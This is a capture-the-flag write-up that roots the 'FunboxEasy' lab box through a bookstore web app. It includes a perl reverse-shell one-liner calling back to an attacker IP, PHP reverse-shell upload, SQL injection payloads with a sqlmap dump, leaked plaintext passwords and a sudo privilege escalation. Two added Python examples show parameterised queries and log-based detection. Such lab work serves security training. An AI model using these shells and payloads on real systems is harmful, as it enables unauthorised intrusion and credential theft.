
FunboxEasy

Nmap
nmap 192.168.178.111 -p- -sS -sV
Host is up (0.097s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
33060/tcp open mysqlx?

Checking out port 80 we have the default install page for Apache 2.

Checking the source on this page reveals no interesting information. From here I executed dirsearch.py against the target machine.

sudo python3 dirsearch.py -u http://192.168.178.111/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --full-url -t 75

Checking the directory /store, we are presented with a web page for 'CSE bookstore'.


Researching 'CSE bookstore' on Google turns up an exploit for unauthenticated RCE. The exploit PoC is linked below.

Online Book Store 1.0 – Unauthenticated Remote Code Execution (webapps exploit for the PHP platform, www.exploit-db.com)

After downloading the PoC I executed it with the following command:

python3 47887.py http://192.168.178.111/store/

When prompted to launch a shell, hit 'y'.

This shell stops us from properly navigating the target machine and returns us to the current working directory once each command has finished executing. As such, I checked which binaries are installed on the target machine so we can spawn a shell from which we can navigate the target properly.

As per the above, perl is installed on the system. From here I started a netcat listener on my attacking machine.

sudo nc -lvp 80

I then executed the following command to gain a perl reverse shell.

perl -e 'use Socket;$i="192.168.49.178";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("sh -i");};'

Moving into the home directory and then into the user tony’s home directory we have passwords.txt. Reading the contents of this text file shows the following information:

ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin

I was then able to log in over SSH as the user tony with that password.

Checking sudo -l for sudo permissions, we see a multitude of entries.

As we can execute these as the user root via sudo without supplying a password, we can use pkexec or time to spawn a bash shell as root.

tony@funbox3:/var/www$ sudo /usr/bin/time /bin/bash

root@funbox3:/var/www# id
uid=0(root) gid=0(root) groups=0(root)

Alternative way

Login Bruteforce

We can simply try the well-known default credential pair admin:admin against http://192.168.120.224/store/admin.php, and we find that we are logged in as the administrator user of this web store.

SQL Injection Vulnerability

Alternatively, we can exploit an SQL injection vulnerability in the unauthenticated portion of this application. Clicking on a book image we are directed to its page with the bookisbn GET parameter, like this:

http://192.168.178.111/store/book.php?bookisbn=978-1-49192-706-9

We can test for SQLi with the simple payload ' or 1=1; --, like so:

http://192.168.178.111/store/book.php?bookisbn=%27%20or%201=1;%20--

And we see that this application indeed seems to be vulnerable based on the following verbose error:

Can't retrieve data You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '--'' at line 1
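As an added illustration (not part of the walkthrough or the bookstore's own code), the following Python stand-in shows why the bookisbn parameter is injectable: the vulnerable lookup concatenates the GET value into the SQL string, while the safe lookup binds it as a parameter. It uses an in-memory SQLite table with made-up titles; note that SQLite accepts the trailing --' as a comment and so returns every book, whereas MySQL requires a space after --, which is why the real application produced the syntax error above instead.

```python
import sqlite3

# Constructed in-memory stand-in for the store's book table (not the app's real schema).
# The first ISBN is the one visible in the walkthrough; the other rows are made up.
BOOKS = [
    ("978-1-49192-706-9", "Book One"),
    ("978-0-00000-000-1", "Book Two"),
    ("978-0-00000-000-2", "Book Three"),
]

PAYLOAD = "' or 1=1; --"  # the probe used against book.php above


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE book (isbn TEXT PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO book VALUES (?, ?)", BOOKS)
    return db


def lookup_vulnerable(db, bookisbn):
    # Mirrors the flaw: the request parameter is pasted straight into the SQL text,
    # so a quote in the value closes the literal and "or 1=1" widens the WHERE clause.
    query = "SELECT isbn, title FROM book WHERE isbn='%s'" % bookisbn
    return db.execute(query).fetchall()


def lookup_safe(db, bookisbn):
    # Parameterised: the driver binds the value, so quote characters stay data.
    return db.execute("SELECT isbn, title FROM book WHERE isbn=?", (bookisbn,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(lookup_vulnerable(db, PAYLOAD))  # every row: WHERE collapsed to "or 1=1"
    print(lookup_safe(db, PAYLOAD))        # []: no ISBN literally equals the payload
```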

SQLMap

Since the website directory for the store is aptly named store, we can venture an educated guess that the underlying database might also be named store. Using sqlmap, we can automate the exploitation and leak database contents:

kali@kali:~$ sqlmap -u http://192.168.178.111/store/book.php?bookisbn= --dump-all --batch -D store
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.4.10#stable}
|_ -| . [.]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

...

Database: store                                                                                                          
Table: admin
[1 entry]
+-------+--------------------------------------------------+
| name  | pass                                             |
+-------+--------------------------------------------------+
| admin | d033e22ae348aeb5660fc2140aec35850c4da997 (admin) |
+-------+--------------------------------------------------+
...
kali@kali:~$ 

And we have obtained the user credentials admin:admin via this vulnerability.

File Upload Vulnerability

Having logged in with the recovered or guessed credentials admin:admin at http://192.168.120.224/store/admin.php, we are redirected to http://192.168.120.224/store/admin_book.php. This page shows a listing of existing books.

In addition, we see a link to Add new book in the top-left portion of the screen that leads us to http://192.168.120.224/store/admin_add.php. Here, it looks like we are able to upload a new file to the store.

We can try uploading a PHP reverse shell from PentestMonkey:

kali@kali:~$ cp /usr/share/webshells/php/php-reverse-shell.php rev.php

We will be sure to change the IP address and port as needed:

kali@kali:~$ cat rev.php 
<?php
// php-reverse-shell - A Reverse Shell implementation in PHP
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
...

$ip = '192.168.118.3';  // CHANGE THIS
$port = 4444;       // CHANGE THIS
...
kali@kali:~$

There is one caveat in the upload process: the Publisher text field cannot be arbitrary and must be one of several choices. We can easily view these choices on the page http://192.168.120.224/store/publisher_list.php:

kali@kali:~$ curl http://192.168.120.224/store/publisher_list.php
<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="utf-8">
...
<div class="container" id="main">   <p class="lead">List of Publisher</p>
        <ul>
                        <li>
                        <span class="badge">2</span>
                    <a href="bookPerPub.php?pubid=1">Wrox</a>
                </li>
                        <li>
                        <span class="badge">2</span>
                    <a href="bookPerPub.php?pubid=2">Wiley</a>
                </li>
                        <li>
                        <span class="badge">3</span>
                    <a href="bookPerPub.php?pubid=3">O'Reilly Media</a>
                </li>
                        <li>
                        <span class="badge">3</span>
                    <a href="bookPerPub.php?pubid=4">Apress</a>
                </li>
                        <li>
                        <span class="badge">0</span>
                    <a href="bookPerPub.php?pubid=5">Packt Publishing</a>
                </li>
                        <li>
                        <span class="badge">1</span>
                    <a href="bookPerPub.php?pubid=6">Addison-Wesley</a>
                </li>
                        <li>
                        <a href="books.php">List full of books</a>
                </li>
        </ul>
...

We see Apress as one of the choices listed, and we will use this publisher label. The rest of the fields can contain arbitrary data.

If we now return to http://192.168.120.224/store/admin_book.php, we will see our new entry added to the top of the list:

ISBN   Title  Author  Image                  Description  Price  Publisher
shell  shell  hacker  php-reverse-shell.php  shell        10.00  Apress     Edit  Delete

Next, we will set up a listener on port 4444 and then trigger the reverse shell by navigating to http://192.168.53.111/store/bootstrap/img/rev.php.

kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ...
192.168.120.224: inverse host lookup failed: Unknown host
connect to [192.168.118.3] from (UNKNOWN) [192.168.120.224] 38114
Linux funbox3 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:16:51 up  1:03,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$

And we have a reverse shell as user www-data.
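From the defender's side, both the SQL injection and the file upload findings leave traces in the web server's access log. The following Python check is an added example (not from the original post): it flags SQL metacharacters in the bookisbn parameter of book.php and script files requested from the store's image directory (the /store/bootstrap/img/ path comes from the trigger URL above). The log lines, client IP and timestamps are constructed for the example.

```python
import re
from urllib.parse import unquote, urlsplit

# Apache combined log, reduced to the fields this check needs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Quote, comment and tautology markers that never belong in a well-formed ISBN.
SQLI_MARKERS = re.compile(r"['\"]|--|/\*|\bor\b\s+\d+\s*=\s*\d+", re.IGNORECASE)
# Directory the store serves book images from; nothing under it should be a script.
UPLOAD_DIR = "/store/bootstrap/img/"
SCRIPT_EXT = (".php", ".phtml", ".phar")

def query_param(query, name):
    """Decoded value of one query parameter, or None. Split manually so a ';' stays in the value."""
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return None

def inspect(line):
    """Return (reason, client_ip, evidence) for a suspicious request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path == "/store/book.php":
        isbn = query_param(url.query, "bookisbn")
        if isbn is not None and SQLI_MARKERS.search(isbn):
            return ("sqli-probe", m.group("ip"), isbn)
    if url.path.startswith(UPLOAD_DIR) and url.path.lower().endswith(SCRIPT_EXT):
        return ("script-in-image-dir", m.group("ip"), url.path)
    return None

def scan(lines):
    return [f for f in map(inspect, lines) if f is not None]

# Constructed sample log: made-up client IP and timestamps, request paths mirroring the walkthrough.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Jan/2021:17:10:02 +0000] "GET /store/book.php?bookisbn=978-1-49192-706-9 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jan/2021:17:10:09 +0000] "GET /store/book.php?bookisbn=%27%20or%201=1;%20-- HTTP/1.1" 200 1740 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jan/2021:17:15:40 +0000] "POST /store/admin_add.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jan/2021:17:16:50 +0000] "GET /store/bootstrap/img/rev.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
10.0.0.5 - - [10/Jan/2021:17:16:51 +0000] "GET /store/bootstrap/img/book1.jpg HTTP/1.1" 200 33021 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for reason, ip, evidence in scan(SAMPLE_LOG):
        print(f"{reason:22} {ip:12} {evidence}")
```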
